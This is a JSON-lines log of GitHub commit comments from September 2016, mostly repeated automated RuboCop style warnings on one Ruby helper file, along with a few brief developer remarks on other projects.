{"id":"4544438208","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974452,"position":58,"line":null,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:54:33Z","updated_at":"2016-09-10T17:54:33Z","body":"Useless assignment to variable - col. Use _ or _col as a variable name to indicate that it won't be used."}},"created_at":"2016-09-10T17:54:33Z"}
{"id":"4544438227","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974453,"position":58,"line":null,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:54:35Z","updated_at":"2016-09-10T17:54:35Z","body":"Useless assignment to variable - level. Use _ or _level as a variable name to indicate that it won't be used."}},"created_at":"2016-09-10T17:54:35Z"}
{"id":"4544438249","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974454,"position":58,"line":null,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:54:36Z","updated_at":"2016-09-10T17:54:36Z","body":"Line is too long. [86/80]"}},"created_at":"2016-09-10T17:54:36Z"}
{"id":"4544438309","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974455,"position":59,"line":null,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:54:38Z","updated_at":"2016-09-10T17:54:38Z","body":"Redundant self detected."}},"created_at":"2016-09-10T17:54:38Z"}
{"id":"4544438353","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974456,"position":60,"line":null,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:54:40Z","updated_at":"2016-09-10T17:54:40Z","body":"Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||."}},"created_at":"2016-09-10T17:54:40Z"}
{"id":"4544439551","type":"CommitCommentEvent","actor":{"login":"bjorn3"},"repo":{"name":"oli-obk/priroda"},"payload":{"comment":{"id":18974457,"position":59,"line":371,"path":"src/interpreter/mod.rs","commit_id":"dfe7712105db8824ab19f843732d641227cecfc1","created_at":"2016-09-10T17:55:33Z","updated_at":"2016-09-10T17:55:33Z","body":"Shouldnt this bug!() in case of a diverging function."}},"created_at":"2016-09-10T17:55:33Z"}
{"id":"4544439890","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974458,"position":null,"line":26,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:55:48Z","updated_at":"2016-09-10T17:55:48Z","body":"Line is too long. [96/80]"}},"created_at":"2016-09-10T17:55:48Z"}
{"id":"4544439941","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974459,"position":null,"line":27,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:55:50Z","updated_at":"2016-09-10T17:55:50Z","body":"Use the new Ruby 1.9 hash syntax."}},"created_at":"2016-09-10T17:55:50Z"}
{"id":"4544440017","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974460,"position":null,"line":28,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:55:53Z","updated_at":"2016-09-10T17:55:53Z","body":"Do not use semicolons to terminate expressions."}},"created_at":"2016-09-10T17:55:53Z"}
{"id":"4544440050","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974461,"position":null,"line":32,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:55:54Z","updated_at":"2016-09-10T17:55:54Z","body":"Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||."}},"created_at":"2016-09-10T17:55:54Z"}
{"id":"4544440081","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974462,"position":null,"line":32,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:55:56Z","updated_at":"2016-09-10T17:55:56Z","body":"Do not use then for multi-line if."}},"created_at":"2016-09-10T17:55:56Z"}
{"id":"4544440114","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974463,"position":null,"line":33,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:55:58Z","updated_at":"2016-09-10T17:55:58Z","body":"Do not use semicolons to terminate expressions."}},"created_at":"2016-09-10T17:55:58Z"}
{"id":"4544440146","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974464,"position":null,"line":35,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:56:00Z","updated_at":"2016-09-10T17:56:00Z","body":"Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||."}},"created_at":"2016-09-10T17:56:00Z"}
{"id":"4544440193","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974465,"position":null,"line":35,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:56:02Z","updated_at":"2016-09-10T17:56:02Z","body":"Do not use then for multi-line if."}},"created_at":"2016-09-10T17:56:02Z"}
{"id":"4544440220","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974466,"position":null,"line":38,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:56:04Z","updated_at":"2016-09-10T17:56:04Z","body":"Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||."}},"created_at":"2016-09-10T17:56:04Z"}
{"id":"4544440244","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974467,"position":null,"line":38,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:56:06Z","updated_at":"2016-09-10T17:56:06Z","body":"Do not use then for multi-line if."}},"created_at":"2016-09-10T17:56:06Z"}
{"id":"4544440279","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974468,"position":null,"line":39,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:56:07Z","updated_at":"2016-09-10T17:56:07Z","body":"Do not use semicolons to terminate expressions."}},"created_at":"2016-09-10T17:56:07Z"}
{"id":"4544440387","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974469,"position":null,"line":44,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:56:11Z","updated_at":"2016-09-10T17:56:11Z","body":"Redundant self detected."}},"created_at":"2016-09-10T17:56:11Z"}
{"id":"4544440478","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974470,"position":null,"line":50,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:56:14Z","updated_at":"2016-09-10T17:56:14Z","body":"Assignment Branch Condition size for rubocop is too high. [16.76/15]"}},"created_at":"2016-09-10T17:56:14Z"}
{"id":"4544440604","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974471,"position":null,"line":50,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:56:19Z","updated_at":"2016-09-10T17:56:19Z","body":"Method has too many lines. [13/10]"}},"created_at":"2016-09-10T17:56:19Z"}
{"id":"4544440699","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974472,"position":null,"line":58,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:56:24Z","updated_at":"2016-09-10T17:56:24Z","body":"Useless assignment to variable - col. Use _ or _col as a variable name to indicate that it won't be used."}},"created_at":"2016-09-10T17:56:24Z"}
{"id":"4544440767","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974473,"position":null,"line":58,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:56:26Z","updated_at":"2016-09-10T17:56:26Z","body":"Useless assignment to variable - level. Use _ or _level as a variable name to indicate that it won't be used."}},"created_at":"2016-09-10T17:56:26Z"}
{"id":"4544440819","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974474,"position":null,"line":58,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:56:29Z","updated_at":"2016-09-10T17:56:29Z","body":"Line is too long. [86/80]"}},"created_at":"2016-09-10T17:56:29Z"}
{"id":"4544440892","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974475,"position":null,"line":59,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:56:31Z","updated_at":"2016-09-10T17:56:31Z","body":"Redundant self detected."}},"created_at":"2016-09-10T17:56:31Z"}
{"id":"4544440999","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974476,"position":null,"line":60,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T17:56:36Z","updated_at":"2016-09-10T17:56:36Z","body":"Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||."}},"created_at":"2016-09-10T17:56:36Z"}
{"id":"4544441033","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18974477,"position":15,"line":387,"path":"src/main/java/net/pms/formats/Format.java","commit_id":"78295dc30bc95310bf7d92af325f082abafd03ba","created_at":"2016-09-10T17:56:38Z","updated_at":"2016-09-10T17:56:38Z","body":"Same remark about \".sw\""}},"created_at":"2016-09-10T17:56:38Z"}
{"id":"4544442411","type":"CommitCommentEvent","actor":{"login":"as59203"},"repo":{"name":"ELynx/pokemon-go-xposed-mitm"},"payload":{"comment":{"id":18974479,"position":4,"line":9,"path":"README.md","commit_id":"b05516a531a239b9e3f438fe24d430cdc3246d17","created_at":"2016-09-10T17:57:44Z","updated_at":"2016-09-10T17:57:44Z","body":"+"}},"created_at":"2016-09-10T17:57:44Z"}
{"id":"4544443379","type":"CommitCommentEvent","actor":{"login":"nuriyevn"},"repo":{"name":"nuriyevn/githooks"},"payload":{"comment":{"id":18974482,"position":null,"line":null,"path":null,"commit_id":"084fa70c26865fbc7310420da2b7d48797c52328","created_at":"2016-09-10T17:58:31Z","updated_at":"2016-09-10T17:58:31Z","body":"instead of comment_commit , read as commit_comment on the readme"}},"created_at":"2016-09-10T17:58:31Z"}
{"id":"4544444519","type":"CommitCommentEvent","actor":{"login":"nagalun"},"repo":{"name":"nagalun/multiplayerpiano-server"},"payload":{"comment":{"id":18974484,"position":null,"line":null,"path":null,"commit_id":"3fa15df38b6e55a6e0cd4055a637afc61bc56798","created_at":"2016-09-10T17:59:13Z","updated_at":"2016-09-10T17:59:13Z","body":"Yeah I delete the string on server.cpp@376, and I don't have a demo server right now up, sorry lol."}},"created_at":"2016-09-10T17:59:13Z"}
{"id":"4544446824","type":"CommitCommentEvent","actor":{"login":"BitcoinBelieverxxx"},"repo":{"name":"BitcoinBelieverxxx/wallet"},"payload":{"comment":{"id":18974488,"position":8,"line":8,"path":"app/.idea/libraries/guava_16_0_1.xml","commit_id":"52ef16bd4a3bee03ac87d2b7f11dba328e9308f1","created_at":"2016-09-10T18:00:44Z","updated_at":"2016-09-10T18:00:44Z","body":"url=\"jar://$USER_HOME$/.gradle/caches/modules-2/files-2.1/com.google.guava/guava/16.0.1/5fa98cd1a63c99a44dd8d3b77e4762b066a5d0c5/guava-16.0.1.jar!/\" />"}},"created_at":"2016-09-10T18:00:44Z"}
{"id":"4544446985","type":"CommitCommentEvent","actor":{"login":"shanmdphd"},"repo":{"name":"dpastoor/r-pharmsciences"},"payload":{"comment":{"id":18974490,"position":18,"line":17,"path":"README.md","commit_id":"f9b6a5262b65b8299e2008c12da8f2c99c56ad6d","created_at":"2016-09-10T18:00:52Z","updated_at":"2016-09-10T18:00:52Z","body":"Thanks for sharing this book. Very helpful. Truly awesome."}},"created_at":"2016-09-10T18:00:52Z"}
{"id":"4544448317","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974497,"position":null,"line":26,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T18:01:46Z","updated_at":"2016-09-10T18:01:46Z","body":"Line is too long. [96/80]"}},"created_at":"2016-09-10T18:01:46Z"}
{"id":"4544448350","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974498,"position":null,"line":27,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T18:01:49Z","updated_at":"2016-09-10T18:01:49Z","body":"Use the new Ruby 1.9 hash syntax."}},"created_at":"2016-09-10T18:01:49Z"}
{"id":"4544448393","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974499,"position":null,"line":28,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T18:01:50Z","updated_at":"2016-09-10T18:01:50Z","body":"Do not use semicolons to terminate expressions."}},"created_at":"2016-09-10T18:01:50Z"}
{"id":"4544448433","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974500,"position":null,"line":32,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T18:01:52Z","updated_at":"2016-09-10T18:01:52Z","body":"Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||."}},"created_at":"2016-09-10T18:01:52Z"}
{"id":"4544448469","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974501,"position":null,"line":32,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T18:01:54Z","updated_at":"2016-09-10T18:01:54Z","body":"Do not use then for multi-line if."}},"created_at":"2016-09-10T18:01:54Z"}
{"id":"4544448509","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974502,"position":null,"line":33,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T18:01:56Z","updated_at":"2016-09-10T18:01:56Z","body":"Do not use semicolons to terminate expressions."}},"created_at":"2016-09-10T18:01:56Z"}
{"id":"4544448541","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974503,"position":null,"line":35,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T18:01:58Z","updated_at":"2016-09-10T18:01:58Z","body":"Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||."}},"created_at":"2016-09-10T18:01:58Z"}
{"id":"4544448579","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974504,"position":null,"line":35,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T18:02:00Z","updated_at":"2016-09-10T18:02:00Z","body":"Do not use then for multi-line if."}},"created_at":"2016-09-10T18:02:00Z"}
{"id":"4544448630","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974505,"position":null,"line":38,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T18:02:02Z","updated_at":"2016-09-10T18:02:02Z","body":"Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||."}},"created_at":"2016-09-10T18:02:02Z"}
{"id":"4544448682","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974506,"position":null,"line":38,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T18:02:04Z","updated_at":"2016-09-10T18:02:04Z","body":"Do not use then for multi-line if."}},"created_at":"2016-09-10T18:02:04Z"}
{"id":"4544448788","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974507,"position":null,"line":39,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T18:02:09Z","updated_at":"2016-09-10T18:02:09Z","body":"Do not use semicolons to terminate expressions."}},"created_at":"2016-09-10T18:02:09Z"}
{"id":"4544448856","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974508,"position":null,"line":44,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T18:02:12Z","updated_at":"2016-09-10T18:02:12Z","body":"Redundant self detected."}},"created_at":"2016-09-10T18:02:12Z"}
{"id":"4544448860","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974509,"position":6,"line":27,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T18:02:12Z","updated_at":"2016-09-10T18:02:12Z","body":"test"}},"created_at":"2016-09-10T18:02:12Z"}
{"id":"4544448940","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974510,"position":null,"line":50,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T18:02:16Z","updated_at":"2016-09-10T18:02:16Z","body":"Assignment Branch Condition size for rubocop is too high. [16.76/15]"}},"created_at":"2016-09-10T18:02:16Z"}
{"id":"4544449001","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974511,"position":null,"line":50,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T18:02:19Z","updated_at":"2016-09-10T18:02:19Z","body":"Method has too many lines. [13/10]"}},"created_at":"2016-09-10T18:02:19Z"}
{"id":"4544449147","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974513,"position":null,"line":58,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T18:02:25Z","updated_at":"2016-09-10T18:02:25Z","body":"Useless assignment to variable - col. Use _ or _col as a variable name to indicate that it won't be used."}},"created_at":"2016-09-10T18:02:25Z"}
{"id":"4544449242","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974514,"position":null,"line":58,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T18:02:29Z","updated_at":"2016-09-10T18:02:29Z","body":"Useless assignment to variable - level. Use _ or _level as a variable name to indicate that it won't be used."}},"created_at":"2016-09-10T18:02:29Z"}
{"id":"4544449285","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974515,"position":null,"line":58,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T18:02:31Z","updated_at":"2016-09-10T18:02:31Z","body":"Line is too long. [86/80]"}},"created_at":"2016-09-10T18:02:31Z"}
{"id":"4544449346","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974516,"position":null,"line":59,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T18:02:33Z","updated_at":"2016-09-10T18:02:33Z","body":"Redundant self detected."}},"created_at":"2016-09-10T18:02:33Z"}
{"id":"4544449390","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974517,"position":null,"line":60,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T18:02:35Z","updated_at":"2016-09-10T18:02:35Z","body":"Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||."}},"created_at":"2016-09-10T18:02:35Z"}
{"id":"4544449424","type":"CommitCommentEvent","actor":{"login":"Seliro"},"repo":{"name":"Seliro/theforgottenserver-7.4"},"payload":{"comment":{"id":18974518,"position":null,"line":null,"path":null,"commit_id":"1871d44c18c9a7c276b7abe25999775bf2338e43","created_at":"2016-09-10T18:02:36Z","updated_at":"2016-09-10T18:02:36Z","body":"relax im still learning github.."}},"created_at":"2016-09-10T18:02:36Z"}
{"id":"4544451255","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18974521,"position":26,"line":404,"path":"src/main/java/net/pms/formats/Format.java","commit_id":"78295dc30bc95310bf7d92af325f082abafd03ba","created_at":"2016-09-10T18:03:34Z","updated_at":"2016-09-10T18:03:34Z","body":"@atamariya Perhaps i didn't understood well, but why \"video/vnd.dlna.mpeg-tts\" is there for ? \r\nIf you meaned that it is not supported i do not agree as it a very compliant and used Mime type\r\n"}},"created_at":"2016-09-10T18:03:34Z"}
{"id":"4544452260","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974525,"position":41,"line":58,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T18:04:17Z","updated_at":"2016-09-10T18:04:17Z","body":"test"}},"created_at":"2016-09-10T18:04:17Z"}
{"id":"4544453143","type":"CommitCommentEvent","actor":{"login":"johnslay"},"repo":{"name":"metova/DataManager"},"payload":{"comment":{"id":18974527,"position":54,"line":68,"path":"Tests/NSManagedObjectContext+TestSwizzle.swift","commit_id":"efc9cfe4cc0f7ef4a954d052936e090ddd0d40e6","created_at":"2016-09-10T18:04:53Z","updated_at":"2016-09-10T18:04:53Z","body":"http://stackoverflow.com/a/38311178"}},"created_at":"2016-09-10T18:04:53Z"}
{"id":"4544453832","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974529,"position":null,"line":58,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T18:05:19Z","updated_at":"2016-09-10T18:05:19Z","body":"test"}},"created_at":"2016-09-10T18:05:19Z"}
{"id":"4544454788","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974531,"position":9,"line":10,"path":"app.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T18:05:58Z","updated_at":"2016-09-10T18:05:58Z","body":"test"}},"created_at":"2016-09-10T18:05:58Z"}
{"id":"4544455734","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974533,"position":7,"line":7,"path":"app.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T18:06:34Z","updated_at":"2016-09-10T18:06:34Z","body":"test"}},"created_at":"2016-09-10T18:06:34Z"}
{"id":"4544456630","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974535,"position":11,"line":32,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T18:07:12Z","updated_at":"2016-09-10T18:07:12Z","body":"test"}},"created_at":"2016-09-10T18:07:12Z"}
{"id":"4544459392","type":"CommitCommentEvent","actor":{"login":"bZichett"},"repo":{"name":"webpack/webpack"},"payload":{"comment":{"id":18974540,"position":null,"line":null,"path":null,"commit_id":"a14e563f67292cf2bdfe28b01abd8cb5fee1e20e","created_at":"2016-09-10T18:09:05Z","updated_at":"2016-09-10T18:09:05Z","body":"Is there another built in way to label the modules in build files?  (By default?)"}},"created_at":"2016-09-10T18:09:05Z"}
{"id":"4544463299","type":"CommitCommentEvent","actor":{"login":"TheLarkInn"},"repo":{"name":"webpack/webpack"},"payload":{"comment":{"id":18974542,"position":null,"line":null,"path":null,"commit_id":"a14e563f67292cf2bdfe28b01abd8cb5fee1e20e","created_at":"2016-09-10T18:11:42Z","updated_at":"2016-09-10T18:11:42Z","body":"Probably a custom plugin that did the same as this one. "}},"created_at":"2016-09-10T18:11:42Z"}
{"id":"4544463537","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18974543,"position":null,"line":null,"path":null,"commit_id":"cc0b4f4b64247028fb7aac857f344e0bda8f2a8f","created_at":"2016-09-10T18:11:52Z","updated_at":"2016-09-10T18:11:52Z","body":"@atamariya Thanks for the explanation :-)"}},"created_at":"2016-09-10T18:11:52Z"}
{"id":"4544463792","type":"CommitCommentEvent","actor":{"login":"Diegoisawesome"},"repo":{"name":"Diegoisawesome/AwesomeMapEditor"},"payload":{"comment":{"id":18974544,"position":null,"line":null,"path":null,"commit_id":"781a7724a78076853762921718725b0955adc705","created_at":"2016-09-10T18:12:04Z","updated_at":"2016-09-10T18:12:04Z","body":"Yeah, both dependencies were on the same line due to Markup's interpretations of newlines so I just fixed that."}},"created_at":"2016-09-10T18:12:04Z"}
{"id":"4544463826","type":"CommitCommentEvent","actor":{"login":"bbeta"},"repo":{"name":"bbeta/Beefox_project"},"payload":{"comment":{"id":18974545,"position":null,"line":null,"path":null,"commit_id":"05cc7129565eb51ee045f89c865849e934679d1c","created_at":"2016-09-10T18:12:06Z","updated_at":"2016-09-10T18:12:06Z","body":"Teste\r\n\r\n"}},"created_at":"2016-09-10T18:12:06Z"}
{"id":"4544470063","type":"CommitCommentEvent","actor":{"login":"SRTDRE76"},"repo":{"name":"flownex/XNXX.bundle"},"payload":{"comment":{"id":18974551,"position":null,"line":null,"path":null,"commit_id":"1e7a9f57c92e58bd4644a8a9cf31db50aed67dde","created_at":"2016-09-10T18:16:32Z","updated_at":"2016-09-10T18:16:32Z","body":"DOES THIS WORK AND HOW I INSYALL GET NOTHING. EMPTY CHANNEL FOLDERS\r\n\r\n"}},"created_at":"2016-09-10T18:16:32Z"}
{"id":"4544472217","type":"CommitCommentEvent","actor":{"login":"philmmanjaro"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":18974554,"position":null,"line":null,"path":null,"commit_id":"86995ac11c3ce888166a70ec462c66019ec78a27","created_at":"2016-09-10T18:18:01Z","updated_at":"2016-09-10T18:18:01Z","body":"What is the exact error you face? Maybe we find a solution for it ..."}},"created_at":"2016-09-10T18:18:01Z"}
{"id":"4544472296","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"avmss3101/EDL"},"payload":{"comment":{"id":18974555,"position":null,"line":null,"path":null,"commit_id":"a379db2948ea0ec02fd4e20f277f34d2c997c629","created_at":"2016-09-10T18:18:06Z","updated_at":"2016-09-10T18:18:06Z","body":"É pra capturar a tela rodando algum programa.\r\n(Favor gravar em png ou jpg)."}},"created_at":"2016-09-10T18:18:06Z"}
